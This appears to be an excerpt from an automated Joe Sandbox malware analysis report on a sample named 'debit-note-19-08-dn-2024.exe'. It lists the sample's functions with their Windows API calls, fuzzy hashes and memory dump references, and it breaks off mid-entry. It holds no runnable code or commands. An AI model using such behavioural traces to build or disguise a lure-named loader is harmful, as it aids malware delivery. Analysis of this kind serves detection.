Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44

Function 004063EE Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84

Function 0040683C Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44

Function 0040695A Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44

Function 004068A6 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44

Function 00403062 Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9

Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3

Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: a26c5c83f9ef2ad83768ff0d809e7d0ff534900b7dfbbf6279fa786ce326c683
Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
Opcode Fuzzy Hash: a26c5c83f9ef2ad83768ff0d809e7d0ff534900b7dfbbf6279fa786ce326c683
Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E

Function 00402454 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C44: RegOpenKeyExW.ADVAPI32(00000000,00000157,00000000,00000022,00000000,?,?), ref: 00402C6C

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402483
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402496
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 08eabb2470022ea022f848a6e11dcf38859f7a65a08fdc0a2d34d61b610d36b3
Instruction ID: 26b43d5caf1540d7dd591319e401bc9d0e282b9307c559b8fc2f3b6a2f24773f
Opcode Fuzzy Hash: 08eabb2470022ea022f848a6e11dcf38859f7a65a08fdc0a2d34d61b610d36b3
Instruction Fuzzy Hash: 31F0D1B1A04204AFEB148FA5DE88EBF767CEF80358F10483EF001A21C0D2B85D419B3A

Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000), ref: 10002963
GetLastError.KERNEL32 ref: 10002A6A

Memory Dump Source

Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: EnumErrorLastWindows
String ID:
API String ID: 14984897-0
Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55

Function 004023E0 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C44: RegOpenKeyExW.ADVAPI32(00000000,00000157,00000000,00000022,00000000,?,?), ref: 00402C6C

RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 1a9fe0657147e393f528c99050b99d89897384afc5368568bb5e959df579fbef
Instruction ID: d7ada52d2c39296e820c3ca3910a3186400bd00b77f85fef4b18c2a42e671548
Opcode Fuzzy Hash: 1a9fe0657147e393f528c99050b99d89897384afc5368568bb5e959df579fbef
Instruction Fuzzy Hash: 53115171915205EEDB14CFA0C6889AFB6B4EF40359F20843FE042A72D0D6B85A41DB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D

Function 004022D5 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C44: RegOpenKeyExW.ADVAPI32(00000000,00000157,00000000,00000022,00000000,?,?), ref: 00402C6C

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
RegCloseKey.ADVAPI32(00000000), ref: 004022FD

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: bd7eda068c5a8c487db824b3b1be550dc0b42a90544fb6549d002859b4f80231
Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
Opcode Fuzzy Hash: bd7eda068c5a8c487db824b3b1be550dc0b42a90544fb6549d002859b4f80231
Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D

Function 0040156B Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 0040157F
ShowWindow.USER32(?), ref: 00401594

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 1e38a0853b33b15907667b679b343be273cdd0c0ce8fe50ce9f9d5bc537c9385
Instruction ID: 75f1c009598274424d440b05a3ad8c81c52a8946c909ad9098faf089b9281bcd
Opcode Fuzzy Hash: 1e38a0853b33b15907667b679b343be273cdd0c0ce8fe50ce9f9d5bc537c9385
Instruction Fuzzy Hash: 2DE04FB2B101049BCB64CBA8ED808FEB7A5AB48314B60453FE902B3290C675AC11CF28

Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
EnableWindow.USER32(00000000,00000000), ref: 00401DE8

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: c62722b4de750a969799caa90d9ea8d5cd16caa5ee659d71882de8b6985993d0
Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
Opcode Fuzzy Hash: c62722b4de750a969799caa90d9ea8d5cd16caa5ee659d71882de8b6985993d0
Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E

Function 00405BB4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,80000000,00000003), ref: 00405BB8
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16

Function 004026F9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713

Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E

Function 00402253 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669

Function 00405C37 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

